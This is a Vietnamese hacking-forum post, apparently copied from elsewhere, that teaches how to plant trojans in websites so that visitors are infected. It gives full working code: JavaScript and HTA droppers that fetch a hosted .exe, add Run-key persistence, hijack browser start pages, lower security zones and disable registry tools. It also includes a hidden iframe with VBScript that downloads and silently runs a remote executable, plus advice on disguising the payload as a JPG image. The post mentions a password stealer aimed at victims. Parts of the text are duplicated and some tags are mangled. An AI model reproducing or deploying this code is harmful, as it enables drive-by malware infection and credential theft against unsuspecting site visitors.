Gắn virut vào web
Trang 1 trong tổng số 1 trang
Gắn virut vào web
cách 1 : dùng một đoạn mã đơn giản để open 1 con trojan ! như chiến dịch của chúng ta !
đoạn mã như sau:
Code:
với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn
cách thứ 2 là cách rất cao cấp
bạn copy vào notepad đoạn mã sau:
Code:
nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là con trojan đã được up lên web
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:
rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set homepage luôn cho chắc ăn...
cách này rất hay...và cao cấp
Kỹ Thuật Nhúng Trojan Vào Website
Link gốc: Nguồn của Vuadapass nè : http://156.freebb.com/vuadapass/vuadapass-article16.html . Vào đấy mà đọc ,đủ 3 cách .
Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a. Dùng 1 đoạn mã javascript để mở và phát tán trojan
CODE
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b. bạn copy vào notepad đoạn mã sau:
CODE
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame
CODE
đoạn 2
CODE
Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip
Đây là chương trình giúp bạn Convert sang "*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
CODE
vào trên cùng
Xuống dưới cùng thay dòng:
CODE
bằng
CODE
Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta
CODE
File htm này sẽ là file để victim truy cập ! Chúc thành công.
Còn thêm nè , để tên File có dạng File ảnh (JPG , GIF ,BMP ...) :
Theo cách 2 , mở Notepad :
Code:
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
đoạn mã như sau:
Code:
- Code:
<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</script>
với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn
cách thứ 2 là cách rất cao cấp
bạn copy vào notepad đoạn mã sau:
Code:
- Code:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("scripting.FileSystemObject");
var Shell = new ActiveXObject("Wscript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("Wscript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools",1, "REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là con trojan đã được up lên web
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:
- Code:
<xml id="oRun">
<preview>
<view>
<![CDATA[
< type="text/html" id="oFile" data="hackervn.hta?id=1">< /object>
]]>
</view>
</preview>
</xml>
</body>
</html>
rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set homepage luôn cho chắc ăn...
cách này rất hay...và cao cấp
Kỹ Thuật Nhúng Trojan Vào Website
Link gốc: Nguồn của Vuadapass nè : http://156.freebb.com/vuadapass/vuadapass-article16.html . Vào đấy mà đọc ,đủ 3 cách .
Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a. Dùng 1 đoạn mã javascript để mở và phát tán trojan
CODE
- Code:
<>
<>
< language="javascript">
try {
var fso = new ActiveXObject("scripting.FileSystemObject");
var Shell = new ActiveXObject("Wscript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "Địa chỉ trojon";');
a2.WriteLine('var burl = "Địa chỉ trojon";');
a2.WriteLine('var fso = new ActiveXObject("scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("Wscript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
< /script>
< windowstate="'minimize'" showintaskbar="'no'">
< /head>
< onload="'window.close()'">
< /body>
< /html>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b. bạn copy vào notepad đoạn mã sau:
CODE
- Code:
<>
< datasrc="#oRun" datafld="view" dataformatas="html">
< id="oRun">
<>
<>
< ![CDATA[ < id="oFile" data="trojan.hta?id=1">< /object>
]]>
< /view>
< /preview>
< /xml>
< /center>
< /body>
< /html>
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame
CODE
- Code:
< width="0" height="0" src="http://link chứa đoạn mã bên dưới">< /iframe>
đoạn 2
CODE
- Code:
< language="VBscript">
on error resume next
dl = "Đường dẫn con Virus dạng .exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< /script>
Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip
Đây là chương trình giúp bạn Convert sang "*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
CODE
- Code:
< language="vbs">
vào trên cùng
Xuống dưới cùng thay dòng:
CODE
- Code:
Wscript.CreateObject("Wscript.Shell").run(pth)
bằng
CODE
- Code:
Set Shell1 = CreateObject("Wscript.Shell") Shell1.Run(pth) < /script> < windowstate="'minimize'" showintaskbar="'no'"> < /head> < onload="'window.close()'"> < /body> < /html>
Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta
CODE
- Code:
<> < datasrc="#oRun" datafld="view" dataformatas="html">< /span> < id="oRun"> <> <> < ![CDATA[ < id="oFile" data="trojan.hta?id=1">< /object> ]]> < /xml> < /center> < /body> < /html>
File htm này sẽ là file để victim truy cập ! Chúc thành công.
Còn thêm nè , để tên File có dạng File ảnh (JPG , GIF ,BMP ...) :
Theo cách 2 , mở Notepad :
Code:
- Code:
< script language="VBscript">
on error resume next
dl = "Đường dẫn con Virus dạng .exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< /script>
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root